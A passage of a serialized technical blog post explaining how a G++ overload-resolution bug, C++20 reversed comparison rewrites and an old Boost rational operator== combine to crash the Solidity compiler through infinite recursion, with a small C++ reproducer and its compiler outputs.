uint256",{"type":28,"tag":116,"props":89629,"children":89630},{"style":266},[89631],{"type":33,"value":347},{"type":28,"tag":116,"props":89633,"children":89634},{"style":350},[89635],{"type":33,"value":1824},{"type":28,"tag":116,"props":89637,"children":89638},{"style":266},[89639],{"type":33,"value":89640},"] data;\n",{"type":28,"tag":116,"props":89642,"children":89643},{"class":245,"line":614},[89644],{"type":28,"tag":116,"props":89645,"children":89646},{"style":266},[89647],{"type":33,"value":3025},{"type":28,"tag":116,"props":89649,"children":89650},{"class":245,"line":631},[89651],{"type":28,"tag":116,"props":89652,"children":89653},{"style":266},[89654],{"type":33,"value":406},{"type":28,"tag":29,"props":89656,"children":89657},{},[89658],{"type":33,"value":89659},"Still crashes.",{"type":28,"tag":29,"props":89661,"children":89662},{},[89663],{"type":33,"value":89664},"So what’s going on?",{"type":28,"tag":29,"props":89666,"children":89667},{},[89668],{"type":33,"value":89669},"We traced it down to a seemingly unrelated C++ line deep in the compiler backend:",{"type":28,"tag":234,"props":89671,"children":89673},{"code":89672,"language":28767,"meta":7,"className":28765,"style":7},"if (*lengthValue == 0) { ... }\n",[89674],{"type":28,"tag":98,"props":89675,"children":89676},{"__ignoreMap":7},[89677],{"type":28,"tag":116,"props":89678,"children":89679},{"class":245,"line":246},[89680,89684,89688,89692,89697,89701,89705],{"type":28,"tag":116,"props":89681,"children":89682},{"style":260},[89683],{"type":33,"value":263},{"type":28,"tag":116,"props":89685,"children":89686},{"style":266},[89687],{"type":33,"value":269},{"type":28,"tag":116,"props":89689,"children":89690},{"style":370},[89691],{"type":33,"value":4240},{"type":28,"tag":116,"props":89693,"children":89694},{"style":266},[89695],{"type":33,"value":89696},"lengthValue ",{"type":28,"tag":116,"props":89698,"children":89699},{"style":370},[89700],{"type":33,"value":2340},{"type":28,"tag":116,"props":89702,"children":89703},{"style":350},[89704],{"type":33,"value":2718},{"type":28,"tag":116,"props":89706,"children":89707},{"style":266},[89708],{"type":33,"value":89709},") { ... }\n",{"type":28,"tag":29,"props":89711,"children":89712},{},[89713,89715,89721],{"type":33,"value":89714},"That single comparison — a ",{"type":28,"tag":98,"props":89716,"children":89718},{"className":89717},[],[89719],{"type":33,"value":89720},"boost::rational",{"type":33,"value":89722}," compared to 0 — causes infinite recursion in G++ \u003C 14 when compiled under C++20. And the resulting stack overflow crashes solc.",{"type":28,"tag":29,"props":89724,"children":89725},{},[89726],{"type":33,"value":89727},"This post unpacks how this happened — and why none of the individual components are technically \"broken\":",{"type":28,"tag":2108,"props":89729,"children":89730},{},[89731,89736,89741],{"type":28,"tag":459,"props":89732,"children":89733},{},[89734],{"type":33,"value":89735},"A 12-year-old overload resolution bug in G++",{"type":28,"tag":459,"props":89737,"children":89738},{},[89739],{"type":33,"value":89740},"An outdated symmetric comparison pattern in Boost",{"type":28,"tag":459,"props":89742,"children":89743},{},[89744],{"type":33,"value":89745},"A subtle but impactful rewrite rule in C++20",{"type":28,"tag":29,"props":89747,"children":89748},{},[89749],{"type":33,"value":89750},"Put together, they form a perfect storm — one that takes down Solidity compilation on default Linux setups, even though your code is perfectly fine.",{"type":28,"tag":18457,"props":89752,"children":89753},{},[],{"type":28,"tag":63,"props":89755,"children":89757},{"id":89756},"background-the-setup",[89758],{"type":33,"value":89759},"Background: The Setup",{"type":28,"tag":29,"props":89761,"children":89762},{},[89763,89765,89772],{"type":33,"value":89764},"If you follow the ",{"type":28,"tag":87,"props":89766,"children":89769},{"href":89767,"rel":89768},"https://docs.soliditylang.org/en/v0.8.30/installing-solidity.html#building-from-source",[91],[89770],{"type":33,"value":89771},"Solidity build documentation (v0.8.30)",{"type":33,"value":89773},", you'll see it recommends:",{"type":28,"tag":2108,"props":89775,"children":89776},{},[89777,89782],{"type":28,"tag":459,"props":89778,"children":89779},{},[89780],{"type":33,"value":89781},"Boost ≥ 1.67",{"type":28,"tag":459,"props":89783,"children":89784},{},[89785],{"type":33,"value":89786},"GCC ≥ 11",{"type":28,"tag":29,"props":89788,"children":89789},{},[89790],{"type":33,"value":89791},"Ubuntu 22.04, for example, ships with:",{"type":28,"tag":2108,"props":89793,"children":89794},{},[89795,89800],{"type":28,"tag":459,"props":89796,"children":89797},{},[89798],{"type":33,"value":89799},"G++ 11.4.0",{"type":28,"tag":459,"props":89801,"children":89802},{},[89803],{"type":33,"value":89804},"Boost 1.74.0",{"type":28,"tag":29,"props":89806,"children":89807},{},[89808],{"type":33,"value":89809},"So far, so good.",{"type":28,"tag":29,"props":89811,"children":89812},{},[89813,89815,89820],{"type":33,"value":89814},"However, Solidity enabled ",{"type":28,"tag":4995,"props":89816,"children":89817},{},[89818],{"type":33,"value":89819},"C++20",{"type":33,"value":89821}," in January 2025:",{"type":28,"tag":107,"props":89823,"children":89824},{},[89825],{"type":28,"tag":29,"props":89826,"children":89827},{},[89828],{"type":28,"tag":87,"props":89829,"children":89832},{"href":89830,"rel":89831},"https://github.com/ethereum/solidity/commit/233a5081835a04939ccf85dfb5286c0b53d23c66",[91],[89833],{"type":33,"value":89834},"Enable C++20 in Solidity",{"type":28,"tag":29,"props":89836,"children":89837},{},[89838],{"type":33,"value":89839},"This wasn't accompanied by an update to the versions of dependencies in the documentation. As we'll soon see, that's what opened the trapdoor.",{"type":28,"tag":18457,"props":89841,"children":89842},{},[],{"type":28,"tag":63,"props":89844,"children":89846},{"id":89845},"part-i-a-12-year-old-g-bug-in-overload-resolution",[89847],{"type":33,"value":89848},"Part I: A 12-Year-Old G++ Bug in Overload Resolution",{"type":28,"tag":75,"props":89850,"children":89852},{"id":89851},"whats-overload-resolution",[89853],{"type":33,"value":89854},"What’s Overload Resolution?",{"type":28,"tag":29,"props":89856,"children":89857},{},[89858,89860,89866,89868,89874,89876,89881,89883,89888,89890,89896,89898,89903,89904,89910],{"type":33,"value":89859},"In C++, when you write an expression like ",{"type":28,"tag":98,"props":89861,"children":89863},{"className":89862},[],[89864],{"type":33,"value":89865},"a == b",{"type":33,"value":89867},", the compiler chooses among available ",{"type":28,"tag":98,"props":89869,"children":89871},{"className":89870},[],[89872],{"type":33,"value":89873},"operator==",{"type":33,"value":89875}," implementations by comparing their ",{"type":28,"tag":4995,"props":89877,"children":89878},{},[89879],{"type":33,"value":89880},"match quality",{"type":33,"value":89882},". A ",{"type":28,"tag":4995,"props":89884,"children":89885},{},[89886],{"type":33,"value":89887},"member function",{"type":33,"value":89889}," like ",{"type":28,"tag":98,"props":89891,"children":89893},{"className":89892},[],[89894],{"type":33,"value":89895},"a.operator==(b)",{"type":33,"value":89897}," usually has higher priority than a ",{"type":28,"tag":4995,"props":89899,"children":89900},{},[89901],{"type":33,"value":89902},"non-member function",{"type":33,"value":89889},{"type":28,"tag":98,"props":89905,"children":89907},{"className":89906},[],[89908],{"type":33,"value":89909},"operator==(a, b)",{"type":33,"value":89911}," — unless the types differ too much or are ambiguous.",{"type":28,"tag":29,"props":89913,"children":89914},{},[89915],{"type":33,"value":89916},"That’s the rule. But G++ didn’t always follow it.",{"type":28,"tag":75,"props":89918,"children":89920},{"id":89919},"the-bug",[89921],{"type":33,"value":89922},"The Bug",{"type":28,"tag":29,"props":89924,"children":89925},{},[89926,89928,89935],{"type":33,"value":89927},"In 2012, a bug was filed: ",{"type":28,"tag":87,"props":89929,"children":89932},{"href":89930,"rel":89931},"https://gcc.gnu.org/bugzilla/show_bug.cgi?id=53499",[91],[89933],{"type":33,"value":89934},"GCC Bug 53499 – overload resolution favors non-member function",{"type":33,"value":89936},". The issue? In expressions where:",{"type":28,"tag":2108,"props":89938,"children":89939},{},[89940,89960],{"type":28,"tag":459,"props":89941,"children":89942},{},[89943,89945,89951,89953,89958],{"type":33,"value":89944},"A class ",{"type":28,"tag":98,"props":89946,"children":89948},{"className":89947},[],[89949],{"type":33,"value":89950},"rational\u003CT>",{"type":33,"value":89952}," has a templated ",{"type":28,"tag":98,"props":89954,"children":89956},{"className":89955},[],[89957],{"type":33,"value":89873},{"type":33,"value":89959}," member function",{"type":28,"tag":459,"props":89961,"children":89962},{},[89963,89965,89971],{"type":33,"value":89964},"There's also a more generic free ",{"type":28,"tag":98,"props":89966,"children":89968},{"className":89967},[],[89969],{"type":33,"value":89970},"operator==(rational\u003CT>, U)",{"type":33,"value":1058},{"type":28,"tag":29,"props":89973,"children":89974},{},[89975],{"type":28,"tag":4995,"props":89976,"children":89977},{},[89978],{"type":33,"value":89979},"Clang correctly chooses the member function.",{"type":28,"tag":29,"props":89981,"children":89982},{},[89983],{"type":28,"tag":4995,"props":89984,"children":89985},{},[89986],{"type":33,"value":89987},"G++ (before v14) chooses the non-member function.",{"type":28,"tag":29,"props":89989,"children":89990},{},[89991,89993,89998,90000,90007],{"type":33,"value":89992},"Why? Because G++ mishandles ",{"type":28,"tag":4995,"props":89994,"children":89995},{},[89996],{"type":33,"value":89997},"templated conversion + non-exact match",{"type":33,"value":89999},", overvaluing a non-member function with worse match quality. It does not correctly apply the overload resolution ranking rules defined in ",{"type":28,"tag":87,"props":90001,"children":90004},{"href":90002,"rel":90003},"https://cplusplus.github.io/CWG/issues/532.html",[91],[90005],{"type":33,"value":90006},"CWG532: Member/nonmember operator template partial ordering",{"type":33,"value":141},{"type":28,"tag":75,"props":90009,"children":90011},{"id":90010},"a-minimal-reproducer",[90012],{"type":33,"value":90013},"A Minimal Reproducer",{"type":28,"tag":29,"props":90015,"children":90016},{},[90017],{"type":33,"value":90018},"Let’s see this in action:",{"type":28,"tag":234,"props":90020,"children":90022},{"code":90021,"language":28767,"meta":7,"className":28765,"style":7},"#include \u003Ciostream>\n\ntemplate \u003Ctypename IntType>\nclass rational {\npublic:\n    template \u003Cclass T>\n    bool operator==(const T& i) const {\n        std::cout \u003C\u003C \"clang++ resolved member\" \u003C\u003C std::endl;\n        return true;\n    }\n};\n\ntemplate \u003Cclass Arg, class IntType>\nbool operator==(const rational\u003CIntType>& a, const Arg& b) {\n    std::cout \u003C\u003C \"g++ \u003C14 resolved non-member\" \u003C\u003C std::endl;\n    return false;\n}\n\nint main() {\n    rational\u003Cint> r;\n    return r == 0;\n}\n",[90023],{"type":28,"tag":98,"props":90024,"children":90025},{"__ignoreMap":7},[90026,90039,90046,90071,90087,90095,90119,90164,90192,90207,90214,90221,90228,90264,90333,90358,90373,90380,90387,90402,90427,90451],{"type":28,"tag":116,"props":90027,"children":90028},{"class":245,"line":246},[90029,90034],{"type":28,"tag":116,"props":90030,"children":90031},{"style":260},[90032],{"type":33,"value":90033},"#include",{"type":28,"tag":116,"props":90035,"children":90036},{"style":563},[90037],{"type":33,"value":90038}," \u003Ciostream>\n",{"type":28,"tag":116,"props":90040,"children":90041},{"class":245,"line":256},[90042],{"type":28,"tag":116,"props":90043,"children":90044},{"emptyLinePlaceholder":19},[90045],{"type":33,"value":1044},{"type":28,"tag":116,"props":90047,"children":90048},{"class":245,"line":293},[90049,90053,90057,90062,90067],{"type":28,"tag":116,"props":90050,"children":90051},{"style":376},[90052],{"type":33,"value":65836},{"type":28,"tag":116,"props":90054,"children":90055},{"style":266},[90056],{"type":33,"value":8391},{"type":28,"tag":116,"props":90058,"children":90059},{"style":376},[90060],{"type":33,"value":90061},"typename",{"type":28,"tag":116,"props":90063,"children":90064},{"style":339},[90065],{"type":33,"value":90066}," IntType",{"type":28,"tag":116,"props":90068,"children":90069},{"style":266},[90070],{"type":33,"value":506},{"type":28,"tag":116,"props":90072,"children":90073},{"class":245,"line":361},[90074,90078,90083],{"type":28,"tag":116,"props":90075,"children":90076},{"style":376},[90077],{"type":33,"value":70029},{"type":28,"tag":116,"props":90079,"children":90080},{"style":339},[90081],{"type":33,"value":90082}," rational",{"type":28,"tag":116,"props":90084,"children":90085},{"style":266},[90086],{"type":33,"value":1291},{"type":28,"tag":116,"props":90088,"children":90089},{"class":245,"line":387},[90090],{"type":28,"tag":116,"props":90091,"children":90092},{"style":376},[90093],{"type":33,"value":90094},"public:\n",{"type":28,"tag":116,"props":90096,"children":90097},{"class":245,"line":400},[90098,90103,90107,90111,90115],{"type":28,"tag":116,"props":90099,"children":90100},{"style":376},[90101],{"type":33,"value":90102},"    template",{"type":28,"tag":116,"props":90104,"children":90105},{"style":266},[90106],{"type":33,"value":8391},{"type":28,"tag":116,"props":90108,"children":90109},{"style":376},[90110],{"type":33,"value":70029},{"type":28,"tag":116,"props":90112,"children":90113},{"style":339},[90114],{"type":33,"value":5590},{"type":28,"tag":116,"props":90116,"children":90117},{"style":266},[90118],{"type":33,"value":506},{"type":28,"tag":116,"props":90120,"children":90121},{"class":245,"line":614},[90122,90126,90131,90136,90140,90144,90148,90152,90156,90160],{"type":28,"tag":116,"props":90123,"children":90124},{"style":376},[90125],{"type":33,"value":46098},{"type":28,"tag":116,"props":90127,"children":90128},{"style":376},[90129],{"type":33,"value":90130}," operator",{"type":28,"tag":116,"props":90132,"children":90133},{"style":266},[90134],{"type":33,"value":90135},"==(",{"type":28,"tag":116,"props":90137,"children":90138},{"style":376},[90139],{"type":33,"value":9323},{"type":28,"tag":116,"props":90141,"children":90142},{"style":339},[90143],{"type":33,"value":5590},{"type":28,"tag":116,"props":90145,"children":90146},{"style":376},[90147],{"type":33,"value":2780},{"type":28,"tag":116,"props":90149,"children":90150},{"style":272},[90151],{"type":33,"value":3068},{"type":28,"tag":116,"props":90153,"children":90154},{"style":266},[90155],{"type":33,"value":1609},{"type":28,"tag":116,"props":90157,"children":90158},{"style":376},[90159],{"type":33,"value":9323},{"type":28,"tag":116,"props":90161,"children":90162},{"style":266},[90163],{"type":33,"value":1291},{"type":28,"tag":116,"props":90165,"children":90166},{"class":245,"line":631},[90167,90172,90177,90182,90187],{"type":28,"tag":116,"props":90168,"children":90169},{"style":266},[90170],{"type":33,"value":90171},"        std::cout ",{"type":28,"tag":116,"props":90173,"children":90174},{"style":370},[90175],{"type":33,"value":90176},"\u003C\u003C",{"type":28,"tag":116,"props":90178,"children":90179},{"style":563},[90180],{"type":33,"value":90181}," \"clang++ resolved member\"",{"type":28,"tag":116,"props":90183,"children":90184},{"style":370},[90185],{"type":33,"value":90186}," \u003C\u003C",{"type":28,"tag":116,"props":90188,"children":90189},{"style":266},[90190],{"type":33,"value":90191}," std::endl;\n",{"type":28,"tag":116,"props":90193,"children":90194},{"class":245,"line":665},[90195,90199,90203],{"type":28,"tag":116,"props":90196,"children":90197},{"style":260},[90198],{"type":33,"value":15405},{"type":28,"tag":116,"props":90200,"children":90201},{"style":376},[90202],{"type":33,"value":1129},{"type":28,"tag":116,"props":90204,"children":90205},{"style":266},[90206],{"type":33,"value":384},{"type":28,"tag":116,"props":90208,"children":90209},{"class":245,"line":713},[90210],{"type":28,"tag":116,"props":90211,"children":90212},{"style":266},[90213],{"type":33,"value":3025},{"type":28,"tag":116,"props":90215,"children":90216},{"class":245,"line":750},[90217],{"type":28,"tag":116,"props":90218,"children":90219},{"style":266},[90220],{"type":33,"value":16239},{"type":28,"tag":116,"props":90222,"children":90223},{"class":245,"line":779},[90224],{"type":28,"tag":116,"props":90225,"children":90226},{"emptyLinePlaceholder":19},[90227],{"type":33,"value":1044},{"type":28,"tag":116,"props":90229,"children":90230},{"class":245,"line":796},[90231,90235,90239,90243,90248,90252,90256,90260],{"type":28,"tag":116,"props":90232,"children":90233},{"style":376},[90234],{"type":33,"value":65836},{"type":28,"tag":116,"props":90236,"children":90237},{"style":266},[90238],{"type":33,"value":8391},{"type":28,"tag":116,"props":90240,"children":90241},{"style":376},[90242],{"type":33,"value":70029},{"type":28,"tag":116,"props":90244,"children":90245},{"style":339},[90246],{"type":33,"value":90247}," Arg",{"type":28,"tag":116,"props":90249,"children":90250},{"style":266},[90251],{"type":33,"value":825},{"type":28,"tag":116,"props":90253,"children":90254},{"style":376},[90255],{"type":33,"value":70029},{"type":28,"tag":116,"props":90257,"children":90258},{"style":339},[90259],{"type":33,"value":90066},{"type":28,"tag":116,"props":90261,"children":90262},{"style":266},[90263],{"type":33,"value":506},{"type":28,"tag":116,"props":90265,"children":90266},{"class":245,"line":847},[90267,90271,90275,90279,90283,90287,90291,90296,90300,90304,90308,90312,90316,90320,90324,90329],{"type":28,"tag":116,"props":90268,"children":90269},{"style":376},[90270],{"type":33,"value":29341},{"type":28,"tag":116,"props":90272,"children":90273},{"style":376},[90274],{"type":33,"value":90130},{"type":28,"tag":116,"props":90276,"children":90277},{"style":266},[90278],{"type":33,"value":90135},{"type":28,"tag":116,"props":90280,"children":90281},{"style":376},[90282],{"type":33,"value":9323},{"type":28,"tag":116,"props":90284,"children":90285},{"style":339},[90286],{"type":33,"value":90082},{"type":28,"tag":116,"props":90288,"children":90289},{"style":266},[90290],{"type":33,"value":514},{"type":28,"tag":116,"props":90292,"children":90293},{"style":339},[90294],{"type":33,"value":90295},"IntType",{"type":28,"tag":116,"props":90297,"children":90298},{"style":266},[90299],{"type":33,"value":645},{"type":28,"tag":116,"props":90301,"children":90302},{"style":376},[90303],{"type":33,"value":2780},{"type":28,"tag":116,"props":90305,"children":90306},{"style":272},[90307],{"type":33,"value":89454},{"type":28,"tag":116,"props":90309,"children":90310},{"style":266},[90311],{"type":33,"value":825},{"type":28,"tag":116,"props":90313,"children":90314},{"style":376},[90315],{"type":33,"value":9323},{"type":28,"tag":116,"props":90317,"children":90318},{"style":339},[90319],{"type":33,"value":90247},{"type":28,"tag":116,"props":90321,"children":90322},{"style":376},[90323],{"type":33,"value":2780},{"type":28,"tag":116,"props":90325,"children":90326},{"style":272},[90327],{"type":33,"value":90328}," b",{"type":28,"tag":116,"props":90330,"children":90331},{"style":266},[90332],{"type":33,"value":844},{"type":28,"tag":116,"props":90334,"children":90335},{"class":245,"line":898},[90336,90341,90345,90350,90354],{"type":28,"tag":116,"props":90337,"children":90338},{"style":266},[90339],{"type":33,"value":90340},"    std::cout ",{"type":28,"tag":116,"props":90342,"children":90343},{"style":370},[90344],{"type":33,"value":90176},{"type":28,"tag":116,"props":90346,"children":90347},{"style":563},[90348],{"type":33,"value":90349}," \"g++ \u003C14 resolved non-member\"",{"type":28,"tag":116,"props":90351,"children":90352},{"style":370},[90353],{"type":33,"value":90186},{"type":28,"tag":116,"props":90355,"children":90356},{"style":266},[90357],{"type":33,"value":90191},{"type":28,"tag":116,"props":90359,"children":90360},{"class":245,"line":907},[90361,90365,90369],{"type":28,"tag":116,"props":90362,"children":90363},{"style":260},[90364],{"type":33,"value":393},{"type":28,"tag":116,"props":90366,"children":90367},{"style":376},[90368],{"type":33,"value":1022},{"type":28,"tag":116,"props":90370,"children":90371},{"style":266},[90372],{"type":33,"value":384},{"type":28,"tag":116,"props":90374,"children":90375},{"class":245,"line":981},[90376],{"type":28,"tag":116,"props":90377,"children":90378},{"style":266},[90379],{"type":33,"value":406},{"type":28,"tag":116,"props":90381,"children":90382},{"class":245,"line":1011},[90383],{"type":28,"tag":116,"props":90384,"children":90385},{"emptyLinePlaceholder":19},[90386],{"type":33,"value":1044},{"type":28,"tag":116,"props":90388,"children":90389},{"class":245,"line":1029},[90390,90394,90398],{"type":28,"tag":116,"props":90391,"children":90392},{"style":376},[90393],{"type":33,"value":18710},{"type":28,"tag":116,"props":90395,"children":90396},{"style":282},[90397],{"type":33,"value":1063},{"type":28,"tag":116,"props":90399,"children":90400},{"style":266},[90401],{"type":33,"value":1068},{"type":28,"tag":116,"props":90403,"children":90404},{"class":245,"line":1038},[90405,90410,90414,90418,90422],{"type":28,"tag":116,"props":90406,"children":90407},{"style":266},[90408],{"type":33,"value":90409},"    rational",{"type":28,"tag":116,"props":90411,"children":90412},{"style":370},[90413],{"type":33,"value":514},{"type":28,"tag":116,"props":90415,"children":90416},{"style":376},[90417],{"type":33,"value":18710},{"type":28,"tag":116,"props":90419,"children":90420},{"style":370},[90421],{"type":33,"value":645},{"type":28,"tag":116,"props":90423,"children":90424},{"style":266},[90425],{"type":33,"value":90426}," r;\n",{"type":28,"tag":116,"props":90428,"children":90429},{"class":245,"line":1047},[90430,90434,90439,90443,90447],{"type":28,"tag":116,"props":90431,"children":90432},{"style":260},[90433],{"type":33,"value":393},{"type":28,"tag":116,"props":90435,"children":90436},{"style":266},[90437],{"type":33,"value":90438}," r ",{"type":28,"tag":116,"props":90440,"children":90441},{"style":370},[90442],{"type":33,"value":2340},{"type":28,"tag":116,"props":90444,"children":90445},{"style":350},[90446],{"type":33,"value":2718},{"type":28,"tag":116,"props":90448,"children":90449},{"style":266},[90450],{"type":33,"value":384},{"type":28,"tag":116,"props":90452,"children":90453},{"class":245,"line":1071},[90454],{"type":28,"tag":116,"props":90455,"children":90456},{"style":266},[90457],{"type":33,"value":406},{"type":28,"tag":2108,"props":90459,"children":90460},{},[90461],{"type":28,"tag":459,"props":90462,"children":90463},{},[90464],{"type":33,"value":90465},"Compile with g++\u003C14:",{"type":28,"tag":234,"props":90467,"children":90469},{"code":90468,"language":3911,"meta":7,"className":3912,"style":7},"g++ -std=c++17 main.cpp -o test && ./test\n",[90470],{"type":28,"tag":98,"props":90471,"children":90472},{"__ignoreMap":7},[90473],{"type":28,"tag":116,"props":90474,"children":90475},{"class":245,"line":246},[90476,90481,90486,90491,90496,90500,90505],{"type":28,"tag":116,"props":90477,"children":90478},{"style":282},[90479],{"type":33,"value":90480},"g++",{"type":28,"tag":116,"props":90482,"children":90483},{"style":563},[90484],{"type":33,"value":90485}," -std=c++17",{"type":28,"tag":116,"props":90487,"children":90488},{"style":563},[90489],{"type":33,"value":90490}," main.cpp",{"type":28,"tag":116,"props":90492,"children":90493},{"style":563},[90494],{"type":33,"value":90495}," -o",{"type":28,"tag":116,"props":90497,"children":90498},{"style":563},[90499],{"type":33,"value":30333},{"type":28,"tag":116,"props":90501,"children":90502},{"style":266},[90503],{"type":33,"value":90504}," && ",{"type":28,"tag":116,"props":90506,"children":90507},{"style":282},[90508],{"type":33,"value":90509},"./test\n",{"type":28,"tag":29,"props":90511,"children":90512},{},[90513],{"type":33,"value":90514},"Output (on g++ 11.4):",{"type":28,"tag":234,"props":90516,"children":90518},{"code":90517},"g++ \u003C14 resolved non-member\n",[90519],{"type":28,"tag":98,"props":90520,"children":90521},{"__ignoreMap":7},[90522],{"type":33,"value":90517},{"type":28,"tag":2108,"props":90524,"children":90525},{},[90526],{"type":28,"tag":459,"props":90527,"children":90528},{},[90529],{"type":33,"value":90530},"Compile with clang++:",{"type":28,"tag":234,"props":90532,"children":90534},{"code":90533,"language":3911,"meta":7,"className":3912,"style":7},"clang++ -std=c++17 main.cpp -o test && ./test\n",[90535],{"type":28,"tag":98,"props":90536,"children":90537},{"__ignoreMap":7},[90538],{"type":28,"tag":116,"props":90539,"children":90540},{"class":245,"line":246},[90541,90546,90550,90554,90558,90562,90566],{"type":28,"tag":116,"props":90542,"children":90543},{"style":282},[90544],{"type":33,"value":90545},"clang++",{"type":28,"tag":116,"props":90547,"children":90548},{"style":563},[90549],{"type":33,"value":90485},{"type":28,"tag":116,"props":90551,"children":90552},{"style":563},[90553],{"type":33,"value":90490},{"type":28,"tag":116,"props":90555,"children":90556},{"style":563},[90557],{"type":33,"value":90495},{"type":28,"tag":116,"props":90559,"children":90560},{"style":563},[90561],{"type":33,"value":30333},{"type":28,"tag":116,"props":90563,"children":90564},{"style":266},[90565],{"type":33,"value":90504},{"type":28,"tag":116,"props":90567,"children":90568},{"style":282},[90569],{"type":33,"value":90509},{"type":28,"tag":29,"props":90571,"children":90572},{},[90573],{"type":33,"value":90574},"Output:",{"type":28,"tag":234,"props":90576,"children":90578},{"code":90577},"clang++ resolved member\n",[90579],{"type":28,"tag":98,"props":90580,"children":90581},{"__ignoreMap":7},[90582],{"type":33,"value":90577},{"type":28,"tag":29,"props":90584,"children":90585},{},[90586],{"type":33,"value":90587},"In short, the wrong function gets picked. G++ was broken here until v14.",{"type":28,"tag":18457,"props":90589,"children":90590},{},[],{"type":28,"tag":63,"props":90592,"children":90594},{"id":90593},"part-ii-c20s-symmetric-comparison-feature",[90595],{"type":33,"value":90596},"Part II: C++20’s Symmetric Comparison Feature",{"type":28,"tag":75,"props":90598,"children":90600},{"id":90599},"what-changed-in-c20",[90601],{"type":33,"value":90602},"What Changed in C++20?",{"type":28,"tag":29,"props":90604,"children":90605},{},[90606,90608,90621,90622,90627],{"type":33,"value":90607},"C++20 introduced the ",{"type":28,"tag":87,"props":90609,"children":90612},{"href":90610,"rel":90611},"https://en.cppreference.com/w/cpp/language/operator_comparison",[91],[90613,90615],{"type":33,"value":90614},"spaceship operator ",{"type":28,"tag":98,"props":90616,"children":90618},{"className":90617},[],[90619],{"type":33,"value":90620},"\u003C=>",{"type":33,"value":10659},{"type":28,"tag":4995,"props":90623,"children":90624},{},[90625],{"type":33,"value":90626},"defaulted comparison rewrites",{"type":33,"value":141},{"type":28,"tag":29,"props":90629,"children":90630},{},[90631,90633,90638],{"type":33,"value":90632},"When you define a two-argument ",{"type":28,"tag":98,"props":90634,"children":90636},{"className":90635},[],[90637],{"type":33,"value":89873},{"type":33,"value":90639},", C++20 may implicitly define the \"reversed\" version:",{"type":28,"tag":2108,"props":90641,"children":90642},{},[90643,90654],{"type":28,"tag":459,"props":90644,"children":90645},{},[90646,90648],{"type":33,"value":90647},"If you define: ",{"type":28,"tag":98,"props":90649,"children":90651},{"className":90650},[],[90652],{"type":33,"value":90653},"bool operator==(T1, T2);",{"type":28,"tag":459,"props":90655,"children":90656},{},[90657,90659,90665],{"type":33,"value":90658},"Then ",{"type":28,"tag":98,"props":90660,"children":90662},{"className":90661},[],[90663],{"type":33,"value":90664},"T2 == T1",{"type":33,"value":90666}," may call the same function by reversing the arguments.",{"type":28,"tag":29,"props":90668,"children":90669},{},[90670,90672,90677,90678,90683,90685,90691,90693,90698],{"type":33,"value":90671},"This rewrite is ",{"type":28,"tag":4995,"props":90673,"children":90674},{},[90675],{"type":33,"value":90676},"recursive",{"type":33,"value":14994},{"type":28,"tag":98,"props":90679,"children":90681},{"className":90680},[],[90682],{"type":33,"value":89865},{"type":33,"value":90684}," becomes ",{"type":28,"tag":98,"props":90686,"children":90688},{"className":90687},[],[90689],{"type":33,"value":90690},"b == a",{"type":33,"value":90692},", which becomes ",{"type":28,"tag":98,"props":90694,"children":90696},{"className":90695},[],[90697],{"type":33,"value":89865},{"type":33,"value":90699}," again, and so on — if not handled carefully.",{"type":28,"tag":29,"props":90701,"children":90702},{},[90703],{"type":33,"value":90704},"This is great for reducing boilerplate — unless the call becomes ambiguous or self-referential.",{"type":28,"tag":18457,"props":90706,"children":90707},{},[],{"type":28,"tag":63,"props":90709,"children":90711},{"id":90710},"part-iii-the-boost-trapdoor",[90712],{"type":33,"value":90713},"Part III: The Boost Trapdoor",{"type":28,"tag":29,"props":90715,"children":90716},{},[90717,90719,90725,90727,90732],{"type":33,"value":90718},"The old Boost ",{"type":28,"tag":98,"props":90720,"children":90722},{"className":90721},[],[90723],{"type":33,"value":90724},"rational",{"type":33,"value":90726}," class (prior to v1.75) defined both member function and non-member function of ",{"type":28,"tag":98,"props":90728,"children":90730},{"className":90729},[],[90731],{"type":33,"value":89873},{"type":33,"value":4160},{"type":28,"tag":234,"props":90734,"children":90736},{"code":90735,"language":28767,"meta":7,"className":28765,"style":7},"template \u003Cclass Arg, class IntType>\ntemplate \u003Ctypename IntType>\nclass rational\n{\n    ...\npublic:\n    ...\n    \n    template \u003Cclass T>\n    BOOST_CONSTEXPR typename boost::enable_if_c\u003Crational_detail::is_compatible_integer\u003CT, IntType>::value, bool>::type operator== (const T& i) const\n    {\n       return ((den == IntType(1)) && (num == i));\n    }\n    ...\n}\n\ntemplate \u003Cclass Arg, class IntType>\nBOOST_CONSTEXPR\ninline typename boost::enable_if_c \u003C\n   rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n   operator == (const Arg& b, const rational\u003CIntType>& a)\n{\n      return a == b; \n}\n",[90737],{"type":28,"tag":98,"props":90738,"children":90739},{"__ignoreMap":7},[90740,90775,90798,90810,90817,90824,90831,90838,90845,90868,90956,90963,91014,91021,91028,91035,91042,91077,91085,91113,91152,91217,91224,91244],{"type":28,"tag":116,"props":90741,"children":90742},{"class":245,"line":246},[90743,90747,90751,90755,90759,90763,90767,90771],{"type":28,"tag":116,"props":90744,"children":90745},{"style":376},[90746],{"type":33,"value":65836},{"type":28,"tag":116,"props":90748,"children":90749},{"style":266},[90750],{"type":33,"value":8391},{"type":28,"tag":116,"props":90752,"children":90753},{"style":376},[90754],{"type":33,"value":70029},{"type":28,"tag":116,"props":90756,"children":90757},{"style":339},[90758],{"type":33,"value":90247},{"type":28,"tag":116,"props":90760,"children":90761},{"style":266},[90762],{"type":33,"value":825},{"type":28,"tag":116,"props":90764,"children":90765},{"style":376},[90766],{"type":33,"value":70029},{"type":28,"tag":116,"props":90768,"children":90769},{"style":339},[90770],{"type":33,"value":90066},{"type":28,"tag":116,"props":90772,"children":90773},{"style":266},[90774],{"type":33,"value":506},{"type":28,"tag":116,"props":90776,"children":90777},{"class":245,"line":256},[90778,90782,90786,90790,90794],{"type":28,"tag":116,"props":90779,"children":90780},{"style":376},[90781],{"type":33,"value":65836},{"type":28,"tag":116,"props":90783,"children":90784},{"style":266},[90785],{"type":33,"value":8391},{"type":28,"tag":116,"props":90787,"children":90788},{"style":376},[90789],{"type":33,"value":90061},{"type":28,"tag":116,"props":90791,"children":90792},{"style":339},[90793],{"type":33,"value":90066},{"type":28,"tag":116,"props":90795,"children":90796},{"style":266},[90797],{"type":33,"value":506},{"type":28,"tag":116,"props":90799,"children":90800},{"class":245,"line":293},[90801,90805],{"type":28,"tag":116,"props":90802,"children":90803},{"style":376},[90804],{"type":33,"value":70029},{"type":28,"tag":116,"props":90806,"children":90807},{"style":339},[90808],{"type":33,"value":90809}," 